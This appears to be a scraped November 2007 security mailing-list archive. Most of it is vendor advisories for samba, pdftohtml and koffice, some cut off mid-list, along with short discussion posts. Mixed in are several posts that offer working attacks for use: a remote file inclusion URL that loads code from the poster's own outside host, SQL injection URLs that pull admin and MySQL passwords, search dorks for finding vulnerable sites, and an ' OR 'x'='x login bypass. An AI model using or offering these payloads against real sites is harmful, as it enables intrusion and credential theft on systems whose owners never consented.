[ MDKSA-2007:224 ] - Updated samba packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:224 http://www.mandriva.com/security/ ___ Package : samba Date: November 17, 2007 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0 ___ Problem Description: The samba developers discovered that nmbd could be made to overrun a buffer during the processing of GETDC logon server requests. If samba is configured as a Primary or Backup Domain Controller, this could be used by a remote attacker to send malicious logon requests and possibly cause a denial of service (CVE-2007-4572). As well, Alin Rad Pop of Secunia Research found that nmbd did not properly check the length of netbios packets. If samba is configured as a WINS server, this could be used by a remote attacker able to send multiple crafted requests to nmbd, resulting in the execution of arbitrary code with root privileges (CVE-2007-5398). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5398 ___ Updated Packages: Mandriva Linux 2007.0: 6368aa53d9c8c1fd148aaf5c0d7cd611 2007.0/i586/libsmbclient0-3.0.23d-2.4mdv2007.0.i586.rpm 0156549dbdcc7a41149b2740513ced16 2007.0/i586/libsmbclient0-devel-3.0.23d-2.4mdv2007.0.i586.rpm 8f7440c0e72cdefea599b59763340c73 2007.0/i586/libsmbclient0-static-devel-3.0.23d-2.4mdv2007.0.i586.rpm d764ca43357c9986182749ec1d59754d 2007.0/i586/mount-cifs-3.0.23d-2.4mdv2007.0.i586.rpm 11f4d98cfb576a93638db86afb81ddbc 2007.0/i586/nss_wins-3.0.23d-2.4mdv2007.0.i586.rpm 356272e00a9bf084f4d9c1186881c14e 2007.0/i586/samba-client-3.0.23d-2.4mdv2007.0.i586.rpm eb485f35789b42df5763e1bef39a1b63 2007.0/i586/samba-common-3.0.23d-2.4mdv2007.0.i586.rpm f6998d901e799c38582f3850be3e0310 2007.0/i586/samba-doc-3.0.23d-2.4mdv2007.0.i586.rpm c7ae75b677d3944f57692f43b7e394ea 2007.0/i586/samba-server-3.0.23d-2.4mdv2007.0.i586.rpm f190c3942d8b5b5b61b93dbde4434f75 2007.0/i586/samba-smbldap-tools-3.0.23d-2.4mdv2007.0.i586.rpm ff4ae9cd14355d33d1c4b6ce61671e14 2007.0/i586/samba-swat-3.0.23d-2.4mdv2007.0.i586.rpm 76752e4ea856defec6355ef393a8314c 2007.0/i586/samba-vscan-clamav-3.0.23d-2.4mdv2007.0.i586.rpm ee54049eca30877d01ade258586bc571 2007.0/i586/samba-vscan-icap-3.0.23d-2.4mdv2007.0.i586.rpm f636aa1026935f2b6e625352da8542e9 2007.0/i586/samba-winbind-3.0.23d-2.4mdv2007.0.i586.rpm f5699dacfd55e7cab0383638351097ad 2007.0/SRPMS/samba-3.0.23d-2.4mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: c2c088d29724477f675bc959fd9a80d1 2007.0/x86_64/lib64smbclient0-3.0.23d-2.4mdv2007.0.x86_64.rpm 1459bd23db7a81b86d354f4a36428ac6 2007.0/x86_64/lib64smbclient0-devel-3.0.23d-2.4mdv2007.0.x86_64.rpm 6293551b44efe03e502a4889ac5c8a7d 2007.0/x86_64/lib64smbclient0-static-devel-3.0.23d-2.4mdv2007.0.x86_64.rpm 65d7b70c8894f9fd779cc69d444de765 2007.0/x86_64/mount-cifs-3.0.23d-2.4mdv2007.0.x86_64.rpm ad04d6c786dc49c93da2a61d7b48c9de 2007.0/x86_64/nss_wins-3.0.23d-2.4mdv2007.0.x86_64.rpm 70ad82e9d7d0b3a3160b023612841d29 2007.0/x86_64/samba-client-3.0.23d-2.4mdv2007.0.x86_64.rpm a60a3ef2e80a02ec2294ecb110965a28 2007.0/x86_64/samba-common-3.0.23d-2.4mdv2007.0.x86_64.rpm 0ed0270f899d8d1f006902f5eb54e01a 2007.0/x86_64/samba-doc-3.0.23d-2.4mdv2007.0.x86_64.rpm 8a6a1a79c5c4dc6f684fd1ecbf431a06 2007.0/x86_64/samba-server-3.0.23d-2.4mdv2007.0.x86_64.rpm 28137474ea05c0eba1e9367d7879058e 2007.0/x86_64/samba-smbldap-tools-3.0.23d-2.4mdv2007.0.x86_64.rpm 5cc8aa4f1e987508a7a97adb5030b876 2007.0/x86_64/samba-swat-3.0.23d-2.4mdv2007.0.x86_64.rpm 9a6d0bd5c92cb7a41ba084d4927b0124 2007.0/x86_64/samba-vscan-clamav-3.0.23d-2.4mdv2007.0.x86_64.rpm 5e1f1630d2940347060926b16e229740 2007.0/x86_64/samba-vscan-icap-3.0.23d-2.4mdv2007.0.x86_64.rpm 32e7612d4c2dfdbda672192cb50286fd 2007.0/x86_64/samba-winbind-3.0.23d-2.4mdv2007.0.x86_64.rpm f5699dacfd55e7cab0383638351097ad 2007.0/SRPMS/samba-3.0.23d-2.4mdv2007.0.src.rpm Mandriva Linux 2007.1: 973177721247bc5e7693a9f8bef52817 2007.1/i586/libsmbclient0-3.0.24-2.3mdv2007.1.i586.rpm 37d6daea5c5258c44839a339b25fb2a6 2007.1/i586/libsmbclient0-devel-3.0.24-2.3mdv2007.1.i586.rpm d2d757221cfbc09a7662969a2d0469f7 2007.1/i586/libsmbclient0-static-devel-3.0.24-2.3mdv2007.1.i586.rpm 71a071d308c544ed1182b96a3fe99ee7 2007.1/i586/mount-cifs-3.0.24-2.3mdv2007.1.i586.rpm bb3a295ab4950db4b26e8b5866adb786 2007.1/i586/nss_wins-3.0.24-2.3mdv2007.1.i586.rpm fa706ef04f25a1d9f1d136a7ea47d32d 2007.1/i586/samba-client-3.
[ MDKSA-2007:223 ] - Updated pdftohtml packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:223 http://www.mandriva.com/security/ ___ Package : pdftohtml Date: November 17, 2007 Affected: 2007.0, 2007.1 ___ Problem Description: Alin Rad Pop found several flaws in how PDF files are handled in pdftohtml. An attacker could create a malicious PDF file that would cause pdftohtml to crash or potentially execute arbitrary code when opened. The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393 ___ Updated Packages: Mandriva Linux 2007.0: 49fc5029a7e8269f057dfab6090ea37f 2007.0/i586/pdftohtml-0.36-5.3mdv2007.0.i586.rpm d3cc008572bf9a179f6c4d1695f7433f 2007.0/SRPMS/pdftohtml-0.36-5.3mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 11b13089a2f357f6082ffd49cf896768 2007.0/x86_64/pdftohtml-0.36-5.3mdv2007.0.x86_64.rpm d3cc008572bf9a179f6c4d1695f7433f 2007.0/SRPMS/pdftohtml-0.36-5.3mdv2007.0.src.rpm Mandriva Linux 2007.1: ceffaf54873223fe405acfc1d62eb12e 2007.1/i586/pdftohtml-0.39-1.2mdv2007.1.i586.rpm f99c3523b19e76caf7fe0d25fac005f9 2007.1/SRPMS/pdftohtml-0.39-1.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 3d168d492c922339bd46e77d38d3ecee 2007.1/x86_64/pdftohtml-0.39-1.2mdv2007.1.x86_64.rpm f99c3523b19e76caf7fe0d25fac005f9 2007.1/SRPMS/pdftohtml-0.39-1.2mdv2007.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFHPyDlmqjQ0CJFipgRAlA5AKDE/v6KDio8ikd5RfkuaG1YXvCMNgCfVDVs ORt0TikF/3PpMJvctWy7kLI= =y8Xd -END PGP SIGNATURE-
[ MDKSA-2007:222 ] - Updated koffice packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:222 http://www.mandriva.com/security/ ___ Package : koffice Date: November 17, 2007 Affected: 2007.1, 2008.0 ___ Problem Description: Alin Rad Pop found several flaws in how PDF files are handled in koffice. An attacker could create a malicious PDF file that would cause koffice to crash or potentially execute arbitrary code when opened. The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393 ___ Updated Packages: Mandriva Linux 2007.1: 17076e2e70f4c8239357c8b3759b2f6e 2007.1/i586/koffice-1.6.2-2.2mdv2007.1.i586.rpm 3b00085a9c9d78f837acecc4ce28d0bd 2007.1/i586/koffice-karbon-1.6.2-2.2mdv2007.1.i586.rpm 1892894aa52de10f75f79a941113e147 2007.1/i586/koffice-kexi-1.6.2-2.2mdv2007.1.i586.rpm 119b40ab2e3750c38ba1d9420dc3cc87 2007.1/i586/koffice-kformula-1.6.2-2.2mdv2007.1.i586.rpm a20128310d1300eea2a7e0377c33119d 2007.1/i586/koffice-kivio-1.6.2-2.2mdv2007.1.i586.rpm 68987196a094a85c911d524354a7e40c 2007.1/i586/koffice-koshell-1.6.2-2.2mdv2007.1.i586.rpm 9b6a2442c504bbec067c9813b58bb826 2007.1/i586/koffice-kplato-1.6.2-2.2mdv2007.1.i586.rpm a7a2ede5140009243d1361fddc64678b 2007.1/i586/koffice-kpresenter-1.6.2-2.2mdv2007.1.i586.rpm 475178a7299668ec27ba25b2e6cf2fbf 2007.1/i586/koffice-krita-1.6.2-2.2mdv2007.1.i586.rpm b5ec4993d0c31712ce393c97eda3f562 2007.1/i586/koffice-kspread-1.6.2-2.2mdv2007.1.i586.rpm 2ac954bd1188b7d33628734e726500cf 2007.1/i586/koffice-kugar-1.6.2-2.2mdv2007.1.i586.rpm 606e1e0d77365bfedb3a158f6dea8dac 2007.1/i586/koffice-kword-1.6.2-2.2mdv2007.1.i586.rpm 6ef96327967ef0d59b2e809544ec5744 2007.1/i586/koffice-progs-1.6.2-2.2mdv2007.1.i586.rpm 9f619f60fb9925bd05f21aac5de87779 2007.1/i586/libkoffice2-karbon-1.6.2-2.2mdv2007.1.i586.rpm 3a923f019eb586c318708e23d1bf901d 2007.1/i586/libkoffice2-karbon-devel-1.6.2-2.2mdv2007.1.i586.rpm 0839057ab5b966572690c29d0aae6e6f 2007.1/i586/libkoffice2-kexi-1.6.2-2.2mdv2007.1.i586.rpm 0feca9ab65ad8c4136cc2d53cdcbaf9f 2007.1/i586/libkoffice2-kexi-devel-1.6.2-2.2mdv2007.1.i586.rpm 6df1b9d108ed3f0d0bfdee052fef216b 2007.1/i586/libkoffice2-kformula-1.6.2-2.2mdv2007.1.i586.rpm 77877f9f0d56be001fa1024eea81fb34 2007.1/i586/libkoffice2-kformula-devel-1.6.2-2.2mdv2007.1.i586.rpm d1c09b4208792195b9ae433b723ef5f7 2007.1/i586/libkoffice2-kivio-1.6.2-2.2mdv2007.1.i586.rpm 9237ec6cac1cb512d0f79958984eca0f 2007.1/i586/libkoffice2-kivio-devel-1.6.2-2.2mdv2007.1.i586.rpm 7b379ff17f7f22a59f70bcfbfae44a1e 2007.1/i586/libkoffice2-koshell-1.6.2-2.2mdv2007.1.i586.rpm 69eb4d6f4a4e10f9920b8be42f825e78 2007.1/i586/libkoffice2-kplato-1.6.2-2.2mdv2007.1.i586.rpm 7f11af8fa17a2b3ba444f2cfb8972249 2007.1/i586/libkoffice2-kpresenter-1.6.2-2.2mdv2007.1.i586.rpm 470b41e8f4b343e8c6c6c56ca41b309b 2007.1/i586/libkoffice2-kpresenter-devel-1.6.2-2.2mdv2007.1.i586.rpm d6e17a776fc890ea53ba2dabac4b0c84 2007.1/i586/libkoffice2-krita-1.6.2-2.2mdv2007.1.i586.rpm 83653955e04e6b68e7e1b8f8d9f0fff0 2007.1/i586/libkoffice2-krita-devel-1.6.2-2.2mdv2007.1.i586.rpm 062f4a1b3fe99be78cd0b4e041a43fb6 2007.1/i586/libkoffice2-kspread-1.6.2-2.2mdv2007.1.i586.rpm 4d449ad4656c71a0a98aaee56d8c3307 2007.1/i586/libkoffice2-kspread-devel-1.6.2-2.2mdv2007.1.i586.rpm a53ca56dbf84d96123fedce5f911e39b 2007.1/i586/libkoffice2-kugar-1.6.2-2.2mdv2007.1.i586.rpm a58b2b273f64239ca1e741c7c8402d48 2007.1/i586/libkoffice2-kugar-devel-1.6.2-2.2mdv2007.1.i586.rpm 20ab5659bf086f4ebb2481783dd484af 2007.1/i586/libkoffice2-kword-1.6.2-2.2mdv2007.1.i586.rpm a60590c36d67b74e2a7b571aa168bed6 2007.1/i586/libkoffice2-kword-devel-1.6.2-2.2mdv2007.1.i586.rpm fad6479691a1c8b1876a0791bba32d0f 2007.1/i586/libkoffice2-progs-1.6.2-2.2mdv2007.1.i586.rpm f167d4ca8ef4b014249b5ae014240516 2007.1/i586/libkoffice2-progs-devel-1.6.2-2.2mdv2007.1.i586.rpm 992bc68b56a5f8c8c028ee3285f9e8b3 2007.1/SRPMS/koffice-1.6.2-2.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: f40556599ad2c8dbb0ac8bcf0abc0a32 2007.1/x86_64/koffice-1.6.2-2.2mdv2007.1.x86_64.rpm eb60d49502f3468357949d6dd0a3042b 2007.1/x86_64/koffice-karbon-1.6.2-2.2mdv2007.1.x86_64.rpm ba82dc12cbb98db328e01efba2736cac 2007.1/x86_64/koffice-kexi-1.6.2-2.2mdv2007.1.x86_64.rpm 09295ad70d7b4b796bd754228f24215b 2007.1/x86_64/koffice-kformula-1.6.2-2.2mdv2007.1.x86_64.rpm 6eac5be48d651f703278bc172bb178d6
Sciurus Hosting Panel Code İnjection
Exploit Link : http://www.r57.li/exploit.txt
security contact for mitsubishi electric?
Hi All, I believe I've found some potentially serious security weaknesses in Mitsubishi Electric's GB-50A web-based aircon controller. (ie: being able to turn off all aircon in a building if it's run by one of these ;-) ) Anyone have any idea how best to get hold of someone at Mitsubishi that can actually do anything about this? cheers, Chris -- Simplistix - Content Management, Zope & Python Consulting - http://www.simplistix.co.uk
Myspace Clone Script (index.php) Remote File Inclusion Vulnerability
##|S n I p E r - S A . C o m|### # # # S NNNNN II PPP E R # # SS NN NN NN II PPP EE RR RR # #SNN NN NN II PPP EE RR R# # SS NN NNNN II PPP EE RR RR # # NNNN NN II PPP EEE # #SS NN NN NN II PP EE # # S NN NN NN II PP EE RR RR # #SS NNNNN II PP EE RR RR # # S NNNNN II PP EE RR RR # # # #|V e r Y - S e c R e T| #found by : VerY-SecReT <>[SnipEr's TeaM] # #HomePage : WwW.SnIpEr-Sa.Com # #DORK (altavista.com): "Search | Invite | Mail | Blog | Forum" # # #EX: http://victim/index.php?pg=http://www.sniper-sa.com/sn2.txt? # # #S.GreetZ: sniper-sa.com & SnIpEr-Sa & Rafoo # #ThanX To: ShoOt3r , 911 , 3badi , Devil-X , Mr.Max , Golden Hacker# #Contact : [EMAIL PROTECTED] & http://www.sniper-sa.com #
Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability
###SnIper-sa.com # # # S nnnnn ii ppp e r # # ss nn nn nn ii ppp ee rr rr # #snn nn nn ii ppp ee rr r# # ss nn nnnn ii ppp ee rr rr # # s nnnn nn ii pp ee # #ss nn nn nn ii pp ee # # s nn nn nn ii pp ee rr rr # #ss nnnnn ii pp ee rr rr # # s nnnnn ii pp ee rr rr # # # #VerY-SecReT found by : VerY SecReT ### HomePage : WwW.SnIpEr-Sa.Com ## Dork : "Powered By The Black Lily 2007" EXPLOIT: http://victim.com/ar/products.php?class=-1%20union%20select%201,2,password,4,username%20from%20admin/* or http://victim.com/en/products.php?class=-1%20union%20select%201,2,3,password,username%20from%20admin/* Admin Panel is in http://victim.com/xx/admin/ # S.GreetZ: sniper-sa.com & sniper-sa & Rafoo # thanx : shoot3r , Devil-X ,ReMOTeR , and all sniper members ## contact-mail : [EMAIL PROTECTED]
net-finity (links.php) Remote SQL Injection Vulnerability
##|S n I p E r - S A . C o m|### # # # S NNNNN II PPP E R # # SS NN NN NN II PPP EE RR RR # #SNN NN NN II PPP EE RR R# # SS NN NNNN II PPP EE RR RR # # NNNN NN II PPP EEE # #SS NN NN NN II PP EE # # S NN NN NN II PP EE RR RR # #SS NNNNN II PP EE RR RR # # S NNNNN II PP EE RR RR # # # #|V e r Y - S e c R e T| #found by : VerY-SecReT <>[SnipEr's TeaM] # #HomePage : WwW.SnIpEr-Sa.Com # #DorK: "Designed & Developed by net-finity" Or "inurl:links.php?link_id=" # # #EX: http://localhost/links.php?link_id=-99%20union%20select%201,user,password,4,5,6,7,8,9%20from%20mysql.user/* # # some web bug in #EX: http://localhost/links.php?link_id=-99%20union%20select%201,2,3,4,password,user,7,8,69,10,11%20from%20mysql.user/* # # #S.GreetZ: sniper-sa.com & SnIpEr-Sa & Rafoo # #ThanX To: ShoOt3r , 911 , 3badi , Devil-X , Mr.Max , Golden Hacker# #Contact : [EMAIL PROTECTED] & http://www.sniper-sa.com #
Re: Microsoft Jet Engine MDB File Parsing Stack Overflow Vulnerability
It would be useful to know if this is also an issue with msjet40.dll 4.0.9510.0 (Windows Server 2003 SP2 + hotfixes). I have an installer for Windows XP SP2 that -- seems -- to cleanly apply Windows Server 2003 SP2's MDAC 2.82. I haven't been able to give it a serious, hard testing because I don't have many apps that still use MDAC. On Fri, 16 Nov 2007 19:25:29 +0800, "cocoruder" <[EMAIL PROTECTED]> said: > > (C:\Windows\System32\msjet40.dll, version is 4.0.8618.0)
RE: Standing Up Against German Laws - Project HayNeedle
> -Original Message- > From: Florian Echtler [mailto:[EMAIL PROTECTED] > Sent: Tuesday, 13 November 2007 20:00 > > > If I read the law correctly, it requires retention of "what IP > > connected to another IP" and "which phone number called where." It > > doesn't bother retaining the URL called (my German is rusty, so I may > > be a little off in my interpretation). Connecting to a random IP on a > > random open port (80 and 443, for example) would be a good start to > > accomplish the goal creating chatter. The issue is that the search > > terms to find those ports could lead to connecting to a site that > > increases your profile against general background chatter, even as it > > is raised with random connection traffic. > As a native German speaker, allow me to clarify: with respect to IP > communication, the law mandates saving the following information for 6 > months: > > - which customer was assigned which IP for what timespan > - sender mail address, receiver mail address and sender IP for each > mail > - in case of VOIP: caller and callee phone number and IP address > > So it wouldn't make much sense to create connection noise on a TCP or > HTTP basis, as this stuff isn't logged. I think one should rather > concentrate on generating email noise in this regard. > > Yours, Florian Hi Florian, The issue with sending email noise is that there is already too much of it already and it is already classified under the banner "spam". I can almost guarantee that were you to start sending random email to many servers, most of their owners would block your IP immediately, or at least look at ways of adding you to RBLs and reporting you to whichever authorities are responsible for enforcing anti-spam and anti-DOS laws. -- "I'd rather be DOSed than VISTAd" - Hilton Travis, 2007 Regards, Hilton Travis Phone: +61 (0)7 3105 9101 (Brisbane, Australia) Phone: +61 (0)419 792 394 Manager, Quark IT www.quarkit.com.au Director, Quark Group www.quarkgroup.com.au War doesn't determine who is right. War determines who is left. This document and any attachments are for the intended recipient only. It may contain confidential, privileged or copyright material which must not be disclosed or distributed. Quark Group Pty. Ltd. T/A Quark Automation, Quark AudioVisual, Quark IT
[USN-544-2] Samba regression
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 === Ubuntu Security Notice USN-544-2 November 16, 2007 samba regression CVE-2007-4572, https://launchpad.net/bugs/163042 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: samba 3.0.22-1ubuntu3.5 Ubuntu 6.10: samba 3.0.22-1ubuntu4.4 Ubuntu 7.04: samba 3.0.24-2ubuntu1.4 Ubuntu 7.10: samba 3.0.26a-1ubuntu2.2 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-544-1 fixed two vulnerabilities in Samba. Fixes for CVE-2007-5398 are unchanged, but the upstream changes for CVE-2007-4572 introduced a regression in all releases which caused Linux smbfs mounts to fail. Additionally, Dapper and Edgy included an incomplete patch which caused configurations using NetBIOS to fail. A proper fix for these regressions does not exist at this time, and so the patch addressing CVE-2007-4572 has been removed. This vulnerability is believed to be an unexploitable denial of service, but a future update will address this issue. We apologize for the inconvenience. Original advisory details: Samba developers discovered that nmbd could be made to overrun a buffer during the processing of GETDC logon server requests. When samba is configured as a Primary or Backup Domain Controller, a remote attacker could send malicious logon requests and possibly cause a denial of service. (CVE-2007-4572) Alin Rad Pop of Secunia Research discovered that nmbd did not properly check the length of netbios packets. When samba is configured as a WINS server, a remote attacker could send multiple crafted requests resulting in the execution of arbitrary code with root privileges. (CVE-2007-5398) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.22-1ubuntu3.5.diff.gz Size/MD5: 152748 b7122c02a226a1755a57090417f85de2 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.22-1ubuntu3.5.dsc Size/MD5: 1195 f6ef5a08db6e861f25b5f1ff73a9382f http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.22.orig.tar.gz Size/MD5: 17542657 5c39505af17cf5caf3d6ed8bab135036 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc-pdf_3.0.22-1ubuntu3.5_all.deb Size/MD5: 6594132 68db73121bfb13117fc0b91f8109fe9d http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-doc_3.0.22-1ubuntu3.5_all.deb Size/MD5: 6901652 f1ad2ed6cee57eb3b957514790b7f92d amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.0.22-1ubuntu3.5_amd64.deb Size/MD5: 426322 936cff5393849c9fd88d9b8455c21d8d http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.0.22-1ubuntu3.5_amd64.deb Size/MD5: 112302 5092e91a4ed1fad45fc505bc46e85f2a http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient_3.0.22-1ubuntu3.5_amd64.deb Size/MD5: 797956 996b10de2c51796bdbfdecaf10133fb4 http://security.ubuntu.com/ubuntu/pool/main/s/samba/python2.4-samba_3.0.22-1ubuntu3.5_amd64.deb Size/MD5: 5971402 f277b1640507144fd30b11ebdff49b91 http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-common_3.0.22-1ubuntu3.5_amd64.deb Size/MD5: 2414232 66c0938434f0ad775a408a702333ed0a http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba-dbg_3.0.22-1ubuntu3.5_amd64.deb Size/MD5: 11893090 8bb0b50b831ecaf9e9acc7a54fd93f7b http://security.ubuntu.com/ubuntu/pool/main/s/samba/samba_3.0.22-1ubuntu3.5_amd64.deb Size/MD5: 3402956 384d641ca8c9010ae7714251258bcd59 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbclient_3.0.22-1ubuntu3.5_amd64.deb Size/MD5: 4041324 2ba7719eb00368a9adc3dab110427ed3 http://security.ubuntu.com/ubuntu/pool/main/s/samba/smbfs_3.0.22-1ubuntu3.5_amd64.deb Size/MD5: 449144 71a75fe7f49d13ce0c70c4c81dd5ee02 http://security.ubuntu.com/ubuntu/pool/main/s/samba/swat_3.0.22-1ubuntu3.5_amd64.deb Size/MD5: 832834 ba592cf37f287510a246c5bab4657bc5 http://security.ubuntu.com/ubuntu/pool/main/s/samba/winbind_3.0.22-1ubuntu3.5_amd64.deb Size/MD5: 1929892 e3fcf79d70b467ddccc8a43f3dc7efbe i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/s/samba/libpam-smbpass_3.0.22-1ubuntu3.5_i386.deb Size/MD5: 366068 f706c0b48e5bbdd95cadebe30be6139e http://security.ubuntu.com/ubuntu/pool/main/s/samba/libsmbclient-dev_3.0.22-1ubuntu3.5_i
rPSA-2007-0241-1 samba samba-swat
rPath Security Advisory: 2007-0241-1 Published: 2007-11-16 Products: rPath Linux 1 Rating: Critical Exposure Level Classification: Remote Root Deterministic Unauthorized Access Updated Versions: [EMAIL PROTECTED]:1/3.0.27-0.1-1 [EMAIL PROTECTED]:1/3.0.27-0.1-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-1894 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5398 Description: Previous versions of the samba package are vulnerable to a remote Arbitrary Code Execution attack when nmbd is configured as a WINS server. http://wiki.rpath.com/Advisories:rPSA-2007-0241 Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
JiRos Upload Manager SQL Injection
Aria-Security Team, http://Aria-Security.net --- Shout Outs: AurA, imm02tal Vendor: http://www.jiros.ne Google Search: JBS v2.0, Powered by JiRo´s.Net Path: files/login.asp Username: anything' OR 'x'='x Password: anything' OR 'x'='x Regards, The-0utl4w Credits Goes To Aria-Security.Net www.Aria-Security.Net
